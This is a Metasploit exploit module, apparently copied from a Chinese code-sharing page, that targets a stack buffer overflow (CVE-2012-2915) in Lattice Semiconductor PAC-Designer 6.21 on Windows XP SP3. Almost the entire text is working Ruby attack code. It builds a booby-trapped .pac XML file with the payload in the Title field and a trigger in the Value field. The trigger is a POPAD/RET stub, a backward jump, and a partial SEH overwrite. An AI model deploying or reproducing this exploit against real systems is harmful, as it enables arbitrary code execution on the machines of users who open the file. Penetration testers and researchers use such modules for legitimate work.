扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", 'Description'=> %q{ This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer 6.21.As a .pac file, when supplying a long string of data to the 'value' field under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption on the stack, which results in arbitrary code execution under the context of the user. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Unknown',#Discovery 'juan vazquez', #Metasploit 'sinn3r'#Metasploit ], 'References' => [ ['CVE', '2012-2915'], ['OSVDB', '82001'], ['EDB', '19006'], ['BID', '53566'], ['URL', 'http://secunia.com/advisories/48741'] ], 'Payload'=> { 'BadChars' => "\x00\x3c\x3e", 'StackAdjustment' => -3500, }, 'DefaultOptions'=> { 'ExitFunction' => "seh" }, 'Platform' => 'win', 'Targets'=> [ [ 'PAC-Designer 6.21 on Windows XP SP3', { # P/P/R in PACD621.exe # ASLR: False, Rebase: False, SafeSEH: False, OS: False 'Ret' => 0x00805020 } ], ], 'Privileged' => false, 'DisclosureDate' => "May 16 2012", 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [true, 'The filename', 'msf.pac']) ], self.class) end def exploit # The payload is placed in the <title> field p = payload.encoded # The trigger is placed in the <value> field, which will jmp to our # payload in the <title> field. buf= "\x5f"#POP EDI buf << "\x5f"#POP EDI buf << "\x5c"#POP ESP buf << "\x61"*6#POPAD x 6 buf << "\x51"#PUSH ECX buf << "\xc3"#RET buf << rand_text_alpha(96-buf.length, payload_badchars) buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"#Jmp back to the beginning of the buffer buf << [target.ret].pack('V')[0,3] # Partial overwrite xml = %Q|<?xml version="1.0"?> <PacDesignData> <DocFmtVersion>1</DocFmtVersion> <DeviceType>ispPAC-CLK5410D</DeviceType> <CreatedBy>PAC-Designer 6.21.1336</CreatedBy> <SummaryInformation> <Title>#{p}</Title> <Author>#{Rex::Text.rand_text_alpha(6)}</Author> </SummaryInformation> <SymbolicSchematicData> <Symbol> <SymKey>153</SymKey> <NameText>Profile 0 Ref Frequency</NameText> <Value>#{buf}</Value> </Symbol> </SymbolicSchematicData> </PacDesignData>| file_create(xml) end end |
体验盒子
